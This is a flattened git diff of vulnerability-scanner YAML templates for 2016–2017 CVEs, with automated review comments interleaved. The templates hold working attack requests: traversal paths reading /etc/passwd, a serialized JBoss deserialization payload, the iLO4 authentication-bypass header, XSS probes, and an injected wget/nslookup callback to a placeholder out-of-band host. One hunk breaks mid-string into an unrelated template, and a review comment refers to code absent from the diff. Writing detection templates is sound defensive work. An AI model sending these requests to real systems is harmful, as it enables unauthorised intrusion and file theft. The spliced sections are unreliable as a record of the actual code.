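Review bot: The matcher's expected value `978015547` is the product `13337*73331` from the path, but nothing says so, and a reader changing one side will silently break the other; add `# 13337*73331 = 978015547 — the product only appears if response_type is evaluated as SpEL` above `words:`. The `client_id=acme` value looks arbitrary; if the unsupported-response-type check indeed fires before any client lookup, a comment saying the client need not exist would save the next reader from registering one — TODO confirm.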
@@ -4,14 +4,17 @@ info: name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure author: suman_kar severity: critical - description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. - tags: cve,cve2016,iot,netgear,router - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 + description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-5649 + - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html + - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2016-5649 cwe-id: CWE-200 + tags: cve,cve2016,iot,netgear,router requests: - raw: @@ -38,3 +41,5 @@ requests: group: 1 regex: - 'Success "([a-z]+)"' + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-6210.yaml b/cves/2016/CVE-2016-6210.yaml index 2b99ccba61..45d87300e4 100644 --- a/cves/2016/CVE-2016-6210.yaml +++ b/cves/2016/CVE-2016-6210.yaml @@ -4,7 +4,6 @@ info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: network,openssh description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 
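Review bot: The extractor regex `'Success "([a-z]+)"'` in the second hunk only captures passwords made of lowercase letters; any digit, uppercase letter or symbol truncates or drops the extracted credential, while the `Success "` framing is what actually identifies the value. Use `'Success "([^"]+)"'` so the whole quoted password is captured. The rewritten description also says the attacker "can then use this password" without ever stating that the page discloses the administrator password; one clause would make it self-contained.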
@@ -16,17 +15,19 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 + tags: cve,cve2016,network,openssh network: - host: - "{{Hostname}}" - - "{{Hostname}}:22" + - "{{Host}}:22" + matchers: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-2][^\d][^\r]+)' + - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r]+' \ No newline at end of file + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index fd2ae09625..3ad1202ab8 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -5,15 +5,17 @@ info: author: pikpikcu severity: high description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cve2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ + - https://www.kb.cert.org/vuls/id/582384 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2016-6277 cwe-id: CWE-352 + tags: cve,cve2016,netgear,rce,iot requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml index 0e56752878..e8000d4ef0 100644 --- a/cves/2016/CVE-2016-7552.yaml 
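Review bot: The new regex's second alternative ends in `[\n^\r]+`, which is a character class matching a newline, a caret or a carriage return — not the intended negated class — so an OpenSSH 7.0–7.2 banner such as `SSH-2.0-OpenSSH_7.2p2 Ubuntu` no longer matches (after `7\.[0-2][^\d]` the next character is `2`, which is not in the class), while the first alternative correctly uses `[^\r\n]+`. Change the line to `- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][^\r\n]+)'`. Since the matcher only reads the banner, this is a version check rather than a behavioural test of the enumeration bug; a comment saying so would set expectations for backported builds.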
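Review bot: In the CVE-2016-6277 hunk `cwe-id: CWE-352` (CSRF) sits next to a description of command execution via shell metacharacters and a newly added reference whose URL itself says `cwe-77-on-netgear`, so the classification looks inconsistent with the weakness the template exercises. If NVD records CWE-352 for this CVE keep it and add a comment explaining that the attack is delivered cross-site; otherwise set `cwe-id: CWE-77`.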
+++ b/cves/2016/CVE-2016-7552.yaml @@ -1,17 +1,21 @@ id: CVE-2016-7552 info: - name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal + name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass author: dwisiswant0 severity: critical - description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. - reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - tags: cve,cve2016,lfi + description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. + reference: + - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 + - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 + - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 + - http://www.securityfocus.com/bid/97599 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 + tags: cve,cve2016,lfi,auth,bypass requests: - method: GET @@ -28,3 +32,5 @@ requests: words: - "Memory map" part: body + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml index a15b21c00b..645a590895 100644 --- a/cves/2016/CVE-2016-7981.yaml +++ b/cves/2016/CVE-2016-7981.yaml 
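Review bot: The description now states the primitive is deleting arbitrary files as root, yet nothing in the template says which file the check targets or whether running it is destructive; the request lines are outside this hunk, so add a comment at the request (`# traversal in the session_id cookie — confirm the referenced path is harmless before scanning production`) once that is verified. The `Memory map` body match in the second hunk also deserves a one-line comment on why that string indicates the bypass succeeded.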
@@ -6,13 +6,17 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981 - tags: cve,cve2016,xss,spip + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-7981 + - https://core.spip.net/projects/spip/repository/revisions/23202 + - https://core.spip.net/projects/spip/repository/revisions/23201 + - https://core.spip.net/projects/spip/repository/revisions/23200 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-7981 cwe-id: CWE-79 + tags: cve,cve2016,xss,spip requests: - method: GET diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 69e67cefdf..3ccefee48d 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/41482 - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 - tags: cve,cve2016,aruba,xss + - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt + - https://www.exploit-db.com/exploits/41482/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 + tags: cve,cve2016,aruba,xss requests: - method: GET diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml index bd7c9bcac5..af5cd151de 100644 --- a/cves/2017/CVE-2017-0929.yaml +++ b/cves/2017/CVE-2017-0929.yaml 
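Review bot: The reference list now carries the same exploit-db entry twice, with and without a trailing slash (`https://www.exploit-db.com/exploits/41482` and `https://www.exploit-db.com/exploits/41482/`); one of the two should be dropped. The same slash-only duplicate appears in the CVE-2017-1000028 (45196), CVE-2017-10974 (42303) and CVE-2017-12542 (44005) hunks, and the new CVE-2017-14135 template lists two the-infosec.com links that look like the same article. If these references are being merged in automatically, normalising trailing slashes before de-duplicating would remove the noise at the source rather than per template.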
@@ -8,12 +8,13 @@ info: reference: - https://hackerone.com/reports/482634 - https://nvd.nist.gov/vuln/detail/CVE-2017-0929 + - https://github.com/dnnsoftware/Dnn.Platform/commit/d3953db85fee77bb5e6383747692c507ef8b94c3 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-0929 cwe-id: CWE-918 - tags: cve,cve2017,oast,ssrf,dnn + tags: cve,cve2017,oast,ssrf,dnn,dotnetnuke requests: - method: GET @@ -29,4 +30,4 @@ requests: - type: status status: - - 500 \ No newline at end of file + - 500 diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index c1eb936feb..c91556d3c0 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml 
@@ -2,28 +2,40 @@ id: CVE-2017-1000028 info: name: GlassFish LFI - author: pikpikcu + author: pikpikcu,daffainfo severity: high description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. - reference: https://www.exploit-db.com/exploits/45196 - tags: cve,cve2017,oracle,glassfish,lfi + reference: + - https://www.exploit-db.com/exploits/45196 + - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 + - https://www.exploit-db.com/exploits/45196/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-1000028 cwe-id: CWE-22 + tags: cve,cve2017,oracle,glassfish,lfi requests: - method: GET path: - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - matchers-condition: and - matchers: - - type: word - words: - - "/sbin/nologin" - part: body + - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" - - type: status - status: - - 200 \ No newline at end of file + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - "status_code == 200" + condition: and + + - type: dsl + dsl: + - "contains(body, 'bit app support')" + - "contains(body, 'fonts')" + - "contains(body, 'extensions')" + - "status_code == 200" + condition: and diff --git a/cves/2017/CVE-2017-1000029.yaml b/cves/2017/CVE-2017-1000029.yaml new file mode 100644 index 0000000000..de88a3a80b --- /dev/null +++ b/cves/2017/CVE-2017-1000029.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2017-1000029 + +info: + name: GlassFish Server Open Source Edition 3.0.1 - LFI + author: 0x_Akoko + severity: high + description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication. + reference: + - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784 + - https://www.cvedetails.com/cve/CVE-2017-1000029 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-1000029 + cwe-id: CWE-200 + tags: cve,cve2017,glassfish,oracle,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/resource/file%3a///etc/passwd/" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index ef6415afce..1ef12d6aae 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml 
@@ -4,14 +4,17 @@ info: name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal author: dwisiswant0 severity: high - reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wordpress,wp-plugin,lfi + reference: + - https://www.exploit-db.com/exploits/49693 + - https://github.com/jqueryfiletree/jqueryfiletree/issues/66 + - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-1000170 cwe-id: CWE-22 + tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery requests: - method: POST @@ -28,4 +31,4 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index d7a07c5e57..703697b544 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml @@ -1,21 +1,21 @@ id: CVE-2017-1000486 info: - name: Primetek Primefaces 5.x EL Injection - RCE + name: Primetek Primefaces 5.x - Remote Code Execution author: Moritz Nentwig severity: critical - description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution + description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution. reference: - https://github.com/mogwailabs/CVE-2017-1000486 - https://github.com/pimps/CVE-2017-1000486 - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 - tags: cve,cve2017,primetek,rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-1000486 cwe-id: CWE-326 + tags: cve,cve2017,primetek,rce,injection requests: - raw: 
@@ -32,4 +32,6 @@ requests: - type: word words: - 'Mogwailabs: CHECKCHECK' - part: header \ No newline at end of file + part: header + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml index 3083d00632..d5bb533add 100644 --- a/cves/2017/CVE-2017-10075.yaml +++ b/cves/2017/CVE-2017-10075.yaml @@ -1,16 +1,19 @@ id: CVE-2017-10075 info: - name: Oracle Content Server XSS + name: Oracle Content Server Cross-Site Scripting author: madrobot severity: high - description: The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. - reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html - tags: cve,cve2017,xss,oracle + description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. + reference: + - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 + - http://www.securitytracker.com/id/1038940 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N - cvss-score: 8.20 + cvss-score: 8.2 cve-id: CVE-2017-10075 + tags: cve,cve2017,xss,oracle requests: - method: GET @@ -27,3 +30,5 @@ requests: words: - "" part: body + +# Enhanced by mp on 2022/04/12 diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 4af42b1f0f..af77696479 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml 
@@ -1,18 +1,20 @@ id: CVE-2017-10271 info: - name: CVE-2017-10271 + name: Oracle Fusion Middleware WebLogic Server - Remote Command Execution author: dr_set severity: high - description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server. reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - tags: cve,cve2017,rce,oracle,weblogic,oast + - https://www.oracle.com/security-alerts/cpuoct2017.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-10271 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-10271 + tags: cve,cve2017,rce,oracle,weblogic,oast requests: - raw: @@ -52,10 +54,12 @@ requests: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS interaction + part: interactsh_protocol # Confirms the DNS interaction words: - "dns" - type: status status: - - 500 \ No newline at end of file + - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2017/CVE-2017-10974.yaml b/cves/2017/CVE-2017-10974.yaml index 1e4cbc67c3..7b1821919c 100644 --- a/cves/2017/CVE-2017-10974.yaml 
+++ b/cves/2017/CVE-2017-10974.yaml @@ -8,6 +8,8 @@ info: reference: - https://www.exploit-db.com/exploits/42303 - https://nvd.nist.gov/vuln/detail/CVE-2017-10974 + - https://www.exploit-db.com/exploits/42303/ + - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -15,7 +17,6 @@ info: cwe-id: CWE-22 tags: cve,cve2017,yaws,lfi - requests: - method: GET path: @@ -33,6 +34,4 @@ requests: - type: dsl dsl: - - '!contains(tolower(body), "supervisor.supervisord.options.warnings.linecache.os.system - wget http://{{interactsh-url}} + nslookup {{interactsh-url}} + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "http" + - "dns" + + - type: word + part: header + words: + - "text/xml" + + - type: word + part: body + words: + - "" + - "" + condition: and diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml old mode 100755 new mode 100644 index 8ead0e5c2a..869ca9180c --- a/cves/2017/CVE-2017-12149.yaml +++ b/cves/2017/CVE-2017-12149.yaml 
@@ -1,20 +1,21 @@ id: CVE-2017-12149 info: - name: Java/Jboss Deserialization [RCE] + name: Jboss Application Server - Remote Code Execution author: fopina severity: critical - description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. + description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 - https://chowdera.com/2020/12/20201229190934023w.html - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 - tags: cve,cve2017,java,rce,deserialization + - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 + - https://bugzilla.redhat.com/show_bug.cgi?id=1486220 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-12149 cwe-id: CWE-502 + tags: cve,cve2017,jboss,java,rce,deserialization requests: - raw: @@ -24,6 +25,7 @@ requests: Content-Type: application/octet-stream {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + - | POST /invoker/EJBInvokerServlet/ HTTP/1.1 Host: {{Hostname}} 
@@ -34,11 +36,13 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "ClassCastException" - part: body - type: word + part: header words: - "application/x-java-serialized-object" - part: header \ No newline at end of file + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml index e6b40b0d91..9bd0b6ab7e 100644 --- a/cves/2017/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -1,38 +1,43 @@ id: CVE-2017-12542 info: - name: ILO4 Authentication bypass + name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass author: pikpikcu severity: critical - description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. + description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://www.exploit-db.com/exploits/44005 - tags: cve,cve2017,ilo4,hpe + - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 + - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us + - https://www.exploit-db.com/exploits/44005/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 + cvss-score: 10 cve-id: CVE-2017-12542 + tags: cve,cve2017,ilo4,hpe,auth-bypass requests: - method: GET path: - "{{BaseURL}}/rest/v1/AccountService/Accounts" + headers: Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA matchers-condition: and matchers: - type: word + part: body words: - "iLO User" - part: body - type: word + part: header words: - "application/json" - part: header - type: status status: - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-12544.yaml b/cves/2017/CVE-2017-12544.yaml index c6e8191672..db385e96b9 100644 --- a/cves/2017/CVE-2017-12544.yaml +++ b/cves/2017/CVE-2017-12544.yaml 
@@ -1,20 +1,22 @@ id: CVE-2017-12544 - -info: - name: HPE System Management - XSS - author: divya_mudgal - severity: medium - description: Reflected Cross-site scripting (XSS) on HPE System Management - reference: - - https://seclists.org/fulldisclosure/2018/Mar/5 - - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2017-12544 - cwe-id: CWE-79 - tags: cve,cve2017,xss,hp - + +info: + name: HPE System Management - XSS + author: divya_mudgal + severity: medium + description: Reflected Cross-site scripting (XSS) on HPE System Management + reference: + - https://seclists.org/fulldisclosure/2018/Mar/5 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 + - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us + - http://www.securitytracker.com/id/1039437 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2017-12544 + cwe-id: CWE-79 + tags: cve,cve2017,xss,hp + requests: - method: GET path: diff --git a/cves/2017/CVE-2017-12583.yaml b/cves/2017/CVE-2017-12583.yaml new file mode 100644 index 0000000000..3fcc19e269 --- /dev/null +++ b/cves/2017/CVE-2017-12583.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2017-12583 + +info: + name: Reflected XSS in doku.php + author: DhiyaneshDK + severity: medium + description: DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php. + reference: + - https://github.com/splitbrain/dokuwiki/issues/2061 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-12583 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"DokuWiki" + tags: cve,cve2017,xss,dokuwiki + +requests: + - method: GET + path: + - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Unable to parse at parameter "".' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index d4f8d1050e..39a22529cf 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml 
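Review bot: The request path is fixed to `{{BaseURL}}/dokuwiki/doku.php?...`, so a DokuWiki served from the web root (where `doku.php` sits directly under the base URL) is never requested and goes undetected. Adding a second path entry `- '{{BaseURL}}/doku.php?id=wiki:welcome&at=...'` with the same `at=` value, together with `stop-at-first-match: true` as used in the CVE-2017-1000028 template elsewhere in this change, covers both layouts without doubling the traffic on a positive hit. The `text/html` header match and the `Unable to parse at parameter` body match can stay as they are.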
@@ -1,17 +1,20 @@ id: CVE-2017-12611 info: - name: Apache Struts2 S2-053 RCE + name: Apache Struts2 S2-053 - Remote Code Execution author: pikpikcu severity: critical - description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack. - reference: https://struts.apache.org/docs/s2-053.html - tags: cve,cve2017,apache,rce,struts + description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks. + reference: + - https://struts.apache.org/docs/s2-053.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-12611 + - https://kb.netapp.com/support/s/article/ka51A000000CgttQAC/NTAP-20170911-0001 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-12611 cwe-id: CWE-20 + tags: cve,cve2017,apache,rce,struts requests: - method: POST @@ -23,8 +26,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml index 2c16f2c1fe..5d0fbb5cea 100644 --- a/cves/2017/CVE-2017-12615.yaml +++ b/cves/2017/CVE-2017-12615.yaml 
@@ -4,18 +4,22 @@ info: name: Apache Tomcat RCE author: pikpikcu severity: high - tags: cve,cve2017,apache,rce - reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 description: | By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. + reference: + - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 + - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E + - http://www.securitytracker.com/id/1039392 + - http://www.securityfocus.com/bid/100901 classification: cvss-metrics: 